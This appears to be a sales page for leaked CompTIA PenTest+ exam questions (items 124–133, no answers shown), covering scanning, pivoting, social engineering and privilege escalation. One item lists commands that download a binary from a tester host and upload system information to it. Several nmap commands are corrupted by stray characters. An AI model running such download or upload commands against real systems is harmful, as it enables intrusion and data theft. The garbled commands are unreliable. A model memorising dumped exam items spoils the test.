Special Summer Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: Board70

PT0-002 Exam Dumps - CompTIA PenTest+ Questions and Answers

Question # 124

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?

Options:

A.

nmap גsn 192.168.0.1/16

B.

nmap גsn 192.168.0.1-254

C.

nmap גsn 192.168.0.1 192.168.0.1.254

D.

nmap גsN 192.168.0.0/24

Buy Now
Question # 125

A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest likelihood of success?

Options:

A.

Attempting to tailgate an employee going into the client's workplace

B.

Dropping a malicious USB key with the company’s logo in the parking lot

C.

Using a brute-force attack against the external perimeter to gain a foothold

D.

Performing spear phishing against employees by posing as senior management

Buy Now
Question # 126

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

Options:

A.

certutil –urlcache –split –f http://192.168.2.124/windows-binaries/ accesschk64.exe

B.

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

C.

schtasks /query /fo LIST /v | find /I “Next Run Time:”

D.

wget http://192.168.2.124/windows-binaries/accesschk64.exe –O accesschk64.exe

Buy Now
Question # 127

A penetration tester conducts an Nmap scan against a target and receives the following results:

Which of the following should the tester use to redirect the scanning tools using TCP port 1080 on the target?

Options:

A.

Nessus

B.

ProxyChains

C.

OWASPZAP

D.

Empire

Buy Now
Question # 128

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Question # 129

A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Options:

A.

Utilize the tunnel as a means of pivoting to other internal devices.

B.

Disregard the IP range, as it is out of scope.

C.

Stop the assessment and inform the emergency contact.

D.

Scan the IP range for additional systems to exploit.

Buy Now
Question # 130

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following BEST describes what happened?

Options:

A.

The penetration tester was testing the wrong assets

B.

The planning process failed to ensure all teams were notified

C.

The client was not ready for the assessment to start

D.

The penetration tester had incorrect contact information

Buy Now
Question # 131

A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

Options:

A.

As backup in case the original documents are lost

B.

To guide them through the building entrances

C.

To validate the billing information with the client

D.

As proof in case they are discovered

Buy Now
Question # 132

A penetration tester obtained the following results after scanning a web server using the dirb utility:

...

GENERATED WORDS: 4612

---- Scanning URL: http://10.2.10.13/ ----

+ http://10.2.10.13/about (CODE:200|SIZE:1520)

+ http://10.2.10.13/home.html (CODE:200|SIZE:214)

+ http://10.2.10.13/index.html (CODE:200|SIZE:214)

+ http://10.2.10.13/info (CODE:200|SIZ E:214)

...

DOWNLOADED: 4612 – FOUND: 4

Which of the following elements is MOST likely to contain useful information for the penetration tester?

Options:

A.

index.html

B.

about

C.

info

D.

home.html

Buy Now
Question # 133

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Exam Code: PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Last Update: Apr 2, 2025
Questions: 464
PT0-002 pdf

PT0-002 PDF

$25.5  $84.99
PT0-002 Engine

PT0-002 Testing Engine

$28.5  $94.99
PT0-002 PDF + Engine

PT0-002 PDF + Testing Engine

$40.5  $134.99